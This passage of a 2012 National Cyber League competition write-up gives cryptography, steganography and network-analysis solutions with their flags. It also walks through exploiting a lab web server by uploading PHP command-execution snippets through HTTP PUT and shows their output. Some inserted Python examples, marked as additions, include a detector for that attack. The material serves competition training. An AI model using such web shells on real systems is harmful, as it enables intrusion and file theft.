-md md5 must be added to match the derivation OpenSSL used in 2012.

Key:

NCL-KUMN-8025

The decrypted string:

Great Job! You did it, you got the final Basic Cryptography
challenge flag. This was certainly a lot harder than the
rest. But the points will be worth your effort. Good luck
on the rest of the game. The flag is: nCL-k?l8-9033
F. Advanced Cryptography

There were four flags for the Advanced Cryptography section. The
focus of the Advanced Cryptography was specifically asymmetric
encryption and, further, the practical implementation and usage of
public key cryptography.

1. Puzzles One, Two, and Three

For the first three Advanced Cryptography puzzles the player
was provided an archive containing six (6) files: the public key,
a corresponding private key, a text file containing the key's
passphrase, and three encrypted "flag" files.

The player only needed to import the GPG keypair into their
keychain, and decrypt each flag.

Flag Questions | Flag Answers

What is the first Advanced Cryptography flag? | nCL-!kC8-8972
What is the second Advanced Cryptography flag? | nCL-xCCl-3487
What is the third Advanced Cryptography flag? | nCL-nuSv-6482

2. Puzzles Four and Five

The last two Advanced Cryptography puzzles require the
participant to brute-force the passphrase on a GPG key, and
then utilize the key to decrypt a flag file. All three files
(encrypted flag, public key, and private key) are provided.

There are various tools publicly available to brute-force GPG
keys. The popular John The Ripper tool has a "Jumbo" version,
which includes the ability to break GPG keys.

The participant can narrow their search range using a
customized dictionary or ruleset detailing the known NCL flag
format. With 466,976 possible passphrase combinations this
brute-force will be time intensive but it's more than breakable.

Flag Questions | Flag Answers

What is the passphrase for the key-pair? | nCL-lSkM-7382
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | nCL-!PWk-3387
G. Steganography

There were a total of seven (7) Steganography challenges in the third
NCL round.

1. First Puzzle

The first Steganography puzzle is simple, containing the flag in
the image's metadata, easily obtainable from the file properties
or even simply passing the image file through the strings utility.

Flag:

NCL-LBJV-5397

2. Second Puzzle

The second Steganography puzzle is less trivial. The image
appears as if it were completely blank, purely white. Attempts
to find the flag within the metadata would be frivolous, as it is
much more simple than that.

This image actually contains the flag in white text, which is
sitting against a white background. Inspection of the image
will reveal that the background is 255/255/255 (RGB) and
certain portions (the text) are 253/253/253 (RGB).

A quick and easy method of retrieving this flag is to use the
Magic Wand tool found in image editing software (like GIMP or
Photoshop). The Magic Wand will select the text, allowing the
player to alter the color of only the text, revealing the flag.

Flag

NCL-JKTY-8343
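The Magic Wand step is just "select every pixel that is not exactly 255/255/255", which is easy to do without an image editor once the pixel data is readable. The following is an added example, not part of the NCL write-up; to stay dependency-free it works on the binary PPM format (P6), constructs its own near-white image with an "L" drawn in 253/253/253, and renders the non-white mask as text:

```python
import re


def make_ppm(width, height, marked, background=(255, 255, 255), ink=(253, 253, 253)):
    """Constructed image: a binary (P6) PPM, white everywhere except the
    pixels listed in `marked`, which get the nearly-white 'ink' colour."""
    header = f"P6\n{width} {height}\n255\n".encode()
    px = bytearray()
    for y in range(height):
        for x in range(width):
            px += bytes(ink if (x, y) in marked else background)
    return header + bytes(px)


def parse_ppm(data):
    """Return (width, height, pixel bytes) for an 8-bit P6 PPM."""
    m = re.match(rb"P6\s+(\d+)\s+(\d+)\s+(\d+)\s", data)
    if not m or m.group(3) != b"255":
        raise ValueError("expected an 8-bit P6 PPM")
    return int(m.group(1)), int(m.group(2)), data[m.end():]


def nonwhite_pixels(data):
    """{(x, y): (r, g, b)} for every pixel that is not pure white; this is
    the selection the Magic Wand makes when clicked on the background."""
    w, h, px = parse_ppm(data)
    found = {}
    for i in range(w * h):
        rgb = tuple(px[3 * i:3 * i + 3])
        if rgb != (255, 255, 255):
            found[(i % w, i // w)] = rgb
    return found


def contrast_mask(data):
    """Render non-white pixels as '#' so the hidden text becomes readable."""
    w, h, _ = parse_ppm(data)
    marked = nonwhite_pixels(data)
    return ["".join("#" if (x, y) in marked else "." for x in range(w)) for y in range(h)]


# Constructed 5x5 image with an "L" drawn in 253/253/253 on 255/255/255.
MARKED = {(1, 1), (1, 2), (1, 3), (2, 3)}
SAMPLE_IMAGE = make_ppm(5, 5, MARKED)

if __name__ == "__main__":
    print("\n".join(contrast_mask(SAMPLE_IMAGE)))
```

A real challenge image would be converted to PPM first (most image tools can write it); the comparison is exact rather than a tolerance because the puzzle relies on a difference of two in each channel, which is invisible to the eye but trivially distinct to code.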
3. Third Puzzle

This image contains another file, embedded using the
BattleSteg algorithm. Using a tool like Digital Invisible Ink the
contestant could easily extract the embedded file, which simply
contains the flag value.

Flag

NCL-OCKM-4576
4. Fourth Puzzle

This image contains another file, embedded using the
BlindHide algorithm. Again using Digital Invisible Ink the
player can easily extract the embedded file, which simply
contains the flag value.

Flag

NCL-KGGS-6551

5. Fifth Puzzle

This image contains another file, embedded using the HideSeek
algorithm.
Unlike the previous algorithms, HideSeek requires a
password. In this case the password "NCL" was used. Digital
Invisible Ink can easily extract the embedded file, which simply
contains the flag value.

Flag

NCL-VHGD-6581

6. Sixth Puzzle

This image contains another file, embedded using the
DynamicBattleSteg algorithm.

DynamicBattleSteg requires a password. In this case the
password "NCL" was used. Digital Invisible Ink can easily
extract the embedded file, which simply contains the flag value.

Flag

NCL-GRBS-4237

7. Seventh Puzzle

The seventh and final Steganography puzzle, and the last flag
for Round 3 of the NCL, is by far the most complex.

The player is provided with an archive containing 26 files,
named with "SC7-" and then a single character, "A" through "Z."

Running the file utility against all of the files will show that the
files are actually portions of a split JPEG file. This will also
reveal that the first piece of the image is actually the part
labeled "A." Reviewing the file sizes will indicate that the
portion labeled "Z" is the last section of the image.

file *
SC7-A: PC bitmap, Windows 3.x format, 1024 x 857 x 24
SC7-B: data
SC7-C: data
SC7-D: data
SC7-E: ERROR: line 22: regexec error 17, (illegal byte sequence)
SC7-F: data
SC7-G: data
SC7-H: data
SC7-I: data
SC7-J: data
SC7-K: data
SC7-L: data
SC7-M: data
SC7-N: data
SC7-O: data
SC7-P: data
SC7-Q: data
SC7-R: data
SC7-S: data
SC7-T: data
SC7-U: data
SC7-V: data
SC7-W: data
SC7-X: data
SC7-Y: data
SC7-Z: data

-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-A
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-B
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-C
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-D
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-E
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-F
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-G
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-H
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-I
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-J
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-K
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-L
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-M
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-N
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-O
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-P
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Q
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-R
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-S
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-T
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-U
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-V
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-W
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-X
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Y
-rw-r--r-- 1 user group 72758 Sep 29 17:10 SC7-Z

At this point the participant likely believes the files simply
need to be concatenated in alphabetical order. But this will
result in a broken image.

The broken image does begin to illustrate what the end image
should look like, assisting the contestant with future spot-
checks of their concatenated orderings.

One solution to finding the proper ordering is trial and error;
another is scripting, enumerating through all of the possible
combinations.

The ordering, however, is actually logical, and not random.

Files "A" through "M" are the even numbered files.

Files "N" through "Z" are the odd numbered files.

A = Part 0
B = Part 2
C = Part 4
D = Part 6
E = Part 8
F = Part 10
G = Part 12
H = Part 14
I = Part 16
J = Part 18
K = Part 20
L = Part 22
M = Part 24
N = Part 1
O = Part 3
P = Part 5
Q = Part 7
R = Part 9
S = Part 11
T = Part 13
U = Part 15
V = Part 17
W = Part 19
X = Part 21
Y = Part 23
Z = Part 25

Which results in the following order:

SC7-A SC7-N SC7-B SC7-O SC7-C SC7-P SC7-D SC7-Q SC7-E SC7-
R SC7-F SC7-S SC7-G SC7-T SC7-H SC7-U SC7-I SC7-V SC7-J SC7-
W SC7-K SC7-X SC7-L SC7-Y SC7-M SC7-Z

Concatenating the files in order provides the player with the
reconstructed image.

cat SC7-A SC7-N SC7-B SC7-O SC7-C SC7-P SC7-D SC7-Q SC7-E
SC7-R SC7-F SC7-S SC7-G SC7-T SC7-H SC7-U SC7-I SC7-V SC7-J
SC7-W SC7-K SC7-X SC7-L SC7-Y SC7-M SC7-Z > fixed.jpg
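The even/odd rule above can be written down once and applied to any number of parts, and the reassembly can be spot-checked in code rather than by eye. The following is an added example, not part of the NCL write-up; the image is a constructed stand-in (a BMP file header, whose bytes 2 to 5 record the total file size, followed by filler), split and labelled the way the challenge files were:

```python
import string
import struct

NAMES = list(string.ascii_uppercase)  # SC7-A ... SC7-Z


def interleaved_order(names):
    """The ordering the write-up derives: the first half of the alphabet holds
    the even-numbered parts and the second half the odd-numbered ones."""
    half = (len(names) + 1) // 2
    evens, odds = names[:half], names[half:]
    order = []
    for i in range(half):
        order.append(evens[i])
        if i < len(odds):
            order.append(odds[i])
    return order


def constructed_bmp(pixel_bytes=3000):
    """Constructed stand-in for the image: a 14-byte BMP file header with the
    correct declared size, then deterministic filler in place of pixels."""
    pixel_offset = 54
    size = pixel_offset + pixel_bytes
    header = b"BM" + struct.pack("<IHHI", size, 0, 0, pixel_offset)
    return header + bytes((i * 7 + 3) % 256 for i in range(size - len(header)))


def split_like_challenge(blob, names):
    """Cut the file into len(names) sequential parts and hand them out under
    the challenge's labels (A = part 0, N = part 1, B = part 2, ...)."""
    n = len(names)
    chunk = -(-len(blob) // n)  # ceiling division
    parts = [blob[i * chunk:(i + 1) * chunk] for i in range(n)]
    return dict(zip(interleaved_order(names), parts))


def reassemble(parts, order):
    return b"".join(parts[name] for name in order)


def bmp_size_matches(blob):
    """Spot-check: a BMP's declared file size must equal what we concatenated."""
    return blob[:2] == b"BM" and struct.unpack("<I", blob[2:6])[0] == len(blob)


if __name__ == "__main__":
    original = constructed_bmp()
    parts = split_like_challenge(original, NAMES)
    good = reassemble(parts, interleaved_order(NAMES))
    wrong = reassemble(parts, sorted(parts))
    print("interleaved matches original:", good == original)
    print("alphabetical matches original:", wrong == original)
    print("size check passes for both:", bmp_size_matches(good), bmp_size_matches(wrong))
```

Note that the header size check passes for the wrong ordering too, because every ordering has the same total length: it catches missing or duplicated parts, not a permutation, which is why the visual spot-check the write-up describes is still the decisive test.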




Now that the participant has the image put back together,
there is still the matter of the embedded file. That's right, this
challenge is not over yet.

Just like all of the previous Steganography puzzles this one
also has a hidden flag within.

This picture of a puzzle has another file embedded within using
the DynamicBattleSteg algorithm, again using "NCL" as the
password. The embedded file is actually another white-text on
white-background image.

Flag

NCL-KLMG-8245
V. NCL Championship

The 2012 Championship for the National Cyber League invited the top ten
players from each conference over the course of the previous three rounds.

This final championship round included all of the challenges that were not solved
during the previous rounds.

In addition to the previous puzzles two new challenges were introduced
within the Web Exploitation and Network Data Analysis sections.

A. Flags

Name | Server | Value
What is the MD5 flag found on Target 1? | 54.243.211.149 (Web Exploitation - Target 1) | 2500
What is the MD5 flag found on Target 2? | 184.72.228.85 (Web Exploitation - Target 2) | 5000
What is the first flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the second flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the third flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the fourth flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1200
What is the fifth flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1300
What snort SID fired on traffic at 05/29-14:44:02.433544? | 127.0.0.4 (Network Data Analysis) | 500
What is the IP address of the attacker? | 127.0.0.4 (Network Data Analysis) | 500
What service is the victim running? (Vendor Product) | 127.0.0.4 (Network Data Analysis) | 500
What URI was the attacker attempting to access? | 127.0.0.4 (Network Data Analysis) | 1000
What CVE is being exploited? | 127.0.0.4 (Network Data Analysis) | 5000
What is the plaintext password for John Smith's account? | 127.0.0.5 (Linux Passwords) | 1000
What is the plaintext password for attackers account (jbowers)? | 127.0.0.5 (Linux Passwords) | 2500
What is the plaintext password for the root account? | 127.0.0.5 (Linux Passwords) | 2500
What is the flag for the fifth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 300
What is the flag for the eighth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 700
What is the flag for the ninth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 900
What is the passphrase for the key-pair? | 127.0.0.7 (Advanced Cryptography) | 5000
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | 127.0.0.7 (Advanced Cryptography) | 5000
What is the flag found in the third Steganography challenge? | 127.0.0.8 (Steganography) | 300
What is the flag found in the fourth Steganography challenge? | 127.0.0.8 (Steganography) | 300
What is the flag found in the fifth Steganography challenge? | 127.0.0.8 (Steganography) | 500
What is the flag found in the sixth Steganography challenge? | 127.0.0.8 (Steganography) | 500
What is the flag found in the seventh Steganography challenge? | 127.0.0.8 (Steganography) | 5000

B. Network Data Analysis

Just like the previous Network Data Analysis round, the player simply
needed to analyze the traffic with a traffic analyzer; however, this time
additional analysis and research needed to be performed on the
findings.

Flag Questions | Flag Answers
What snort SID fired on traffic at 05/29-14:44:02.433544? | 2464
What is the IP address of the attacker? | 172.16.4.117
What service is the victim running? (Vendor Product) | Apache Tomcat
What URI was the attacker attempting to access? | /webdav/examples/SendMailServlet
What CVE is being exploited? | CVE-2007-3383

C. Web Exploitation - Target Three

This Web Application simply displays a directory listing.



Navigating to the "flag_01.php" file simply displays an error message:

Try Again

Going to "put.php" returns a 405 HTTP Error (Method Not
Allowed) and provides a textual error:

Error: Invalid Method

Knowing the fundamentals of HTTP, the error message and file name
should have provided ample hints, but if those failed most web
vulnerability scanners (like Nikto) would also uncover the fact that
the web server accepts PUT requests, allowing an attacker to upload
files to the web server unrestricted.

Under normal circumstances the attacker could manually launch the
PUT request utilizing a socket tool like netcat; in this case further
steps must be taken as HTTPS is in use. Therefore the participant will
need to use another tool or method to execute the HTTP PUT request
against the server.
One such useful tool is the Poster Firefox Add-On. Poster allows the
user to manipulate HTTP requests as needed and supports common and
custom HTTP Request Methods.



The player is able to clearly confirm they have the ability to upload
and execute PHP code.
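From the defender's side, the misconfiguration above leaves a distinctive trace in the web server's access log: a PUT that the server accepted (2xx) for a path with an executable extension, followed by a request for that same path. The following detector is an added example (not part of the original NCL write-up); it runs over constructed Apache combined-format log lines, and the IPs, paths and timestamps in it are made up.

```python
import re
from typing import Dict, List, Tuple

# Constructed Apache combined-format access log lines (not from the NCL target);
# client IPs, paths and timestamps are invented for illustration.
SAMPLE_LOG = """\
198.51.100.7 - - [20/Dec/2012:15:17:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Dec/2012:15:17:05 +0000] "GET /flag_01.php HTTP/1.1" 200 9 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Dec/2012:15:17:09 +0000] "GET /put.php HTTP/1.1" 405 20 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Dec/2012:15:17:30 +0000] "PUT /cmd.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Dec/2012:15:17:35 +0000] "GET /cmd.php HTTP/1.1" 200 1440 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Dec/2012:15:18:02 +0000] "PUT /notes.txt HTTP/1.1" 403 0 "-" "curl/7.22.0"
"""

# Fields we need from the combined log format: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# Extensions the server would hand to an interpreter rather than serve as static content.
EXEC_EXTENSIONS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

def parse_line(line: str) -> Dict[str, str]:
    """Parse one access-log line; return an empty dict for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def successful_puts(log_text: str) -> List[Tuple[str, str]]:
    """Every PUT the server accepted (2xx). On a server that should never take
    uploads, each of these is already worth an alert."""
    return [(r["ip"], r["path"]) for r in map(parse_line, log_text.splitlines())
            if r and r["method"] == "PUT" and 200 <= int(r["status"]) < 300]

def find_put_then_exec(log_text: str) -> List[Tuple[str, str]]:
    """(client_ip, path) pairs where a client uploaded an executable file via PUT
    and later fetched that same path, i.e. the upload-then-execute pattern."""
    uploaded = set()
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], int(rec["status"])
        if method == "PUT" and 200 <= status < 300 and path.lower().endswith(EXEC_EXTENSIONS):
            uploaded.add((ip, path))
        elif method == "GET" and status == 200 and (ip, path) in uploaded:
            hits.append((ip, path))
    return hits

if __name__ == "__main__":
    for ip, path in find_put_then_exec(SAMPLE_LOG):
        print(f"ALERT upload-then-execute: {ip} PUT {path} and then requested it")
```

The same pairing (accepted PUT, then a 200 on the new path) is what an IDS or SIEM correlation rule would key on; on the NCL target the simpler fix is to disable PUT entirely on the web root.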



At this point the player needs to upload a set of PHP instructions that
will allow them to read the contents of flag_01.php.

<?php print "<pre>"; system("cat flag_01.php"); print "</pre>"; ?>

Looking at the source of the returned page will reveal the first flag.

<? echo "Try Again"; // NCL-JOFW-9345 ?>

Now the contestant needs to find four other flags, but there aren't any
hints to indicate where the flags may be. Searches of the web
directories will show that there are no flags there. A simple find or
locate should do the trick. The locate Linux utility is great at quickly
finding files that contain a particular name and, based on the initial
flag's file name, it's a wise idea to search for the term "flag."

<?php print "<pre>"; system("locate flag"); print "</pre>"; ?>

Browsing to our newly uploaded script will provide a listing of all of
the files with the term "flag" in their name:

/flag_04.txt.asc
/flag_04.txt.gpg
/flag_05.tgz.asc
/flag_05.tgz.gpg
/etc/flag_02.txt
/home/ubuntu/flag_03.txt
/usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al
/usr/lib/perl/5.14.2/bits/waitflags.ph
/var/www/flag_01.php

The player now has the location of the remaining four flags. The
second and third ones can be obtained via a simple display of the file
contents.

<?php
print "Flag02:<pre>";
system("cat /etc/flag_02.txt"); print "</pre>";
print "Flag03:<pre>";
system("cat /home/ubuntu/flag_03.txt"); print "</pre>";
?>

Returning:
Flag02:
NCL-ONGD-0832
Flag03:
NCL-HSFH-8943
The fourth and fifth flags have a familiar extension, ASC being
ASCII-armored encrypted output from GPG. In fact it seems there
is a binary version of the same file ending in GPG. This will not be
as simple as outputting the file. A quick listing of the root level
directory contents will surely reveal some useful information.

<?php print "<pre>"; system("ls -la"); print "</pre>"; ?>

total 116
drwxr-xr-x 23 root root 4096 Nov 23 18:41 .
drwxr-xr-x 23 root root 4096 Nov 23 18:41 ..
drwxr-xr-x 2 root root 4096 Oct 12 16:46 bin
drwxr-xr-x 3 root root 4096 Oct 12 16:48 boot
drwxr-xr-x 12 root root 3880 Dec 20 06:35 dev
drwxr-xr-x 89 root root 4096 Dec 20 06:35 etc
-rw-r--r-- 1 root root 580 Nov 23 18:40 flag_04.txt.asc
-rw-r--r-- 1 root root 357 Nov 23 18:39 flag_04.txt.gpg
-rw-r--r-- 1 root root 742 Nov 23 18:41 flag_05.tgz.asc
-rw-r--r-- 1 root root 476 Nov 23 18:41 flag_05.tgz.gpg
-rw-r--r-- 1 root root 3501 Nov 23 18:38 gpg.key
drwxr-xr-x 3 root root 4096 Apr 24 2012 home
lrwxrwxrwx 1 root root 33 Apr 24 2012 initrd.img
drwxr-xr-x 18 root root 4096 Oct 12 16:46 lib
drwxr-xr-x 2 root root 4096 Oct 12 16:45 lib64
drwx------ 2 root root 16384 Apr 24 2012 lost+found
drwxr-xr-x 2 root root 4096 Apr 24 2012 media
drwxr-xr-x 3 root root 4096 Oct 17 11:40 mnt
drwxr-xr-x 2 root root 4096 Apr 24 2012 opt
dr-xr-xr-x 81 root root 0 Dec 20 06:33 proc
-rw-r--r-- 1 root root 4941 Nov 23 18:38 pub.key
drwx------ 4 root root 4096 Dec 1 21:46 root
drwxr-xr-x 16 root root 600 Dec 20 15:18 run
drwxr-xr-x 2 root root 4096 Oct 12 16:47 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 Apr 24 2012 srv
drwxr-xr-x 13 root root 0 Dec 20 06:33 sys
drwxrwxrwt 2 root root 4096 Dec 20 15:17 tmp
drwxr-xr-x 10 root root 4096 Apr 24 2012 usr
drwxr-xr-x 13 root root 4096 Dec 1 22:00 var
lrwxrwxrwx 1 root root 29 Apr 24 2012 vmlinuz

The contestant should hopefully notice the two GPG related
files, gpg.key and pub.key. At that point the player can
download and import the keys (which have no passphrase),
decrypting the fourth and fifth flags.

Flag Questions | Flag Answers
What is the fourth flag found on Target 3? | nCL-nlu!-4726
What is the fifth flag found on Target 3? | nCL-LCnk-4237
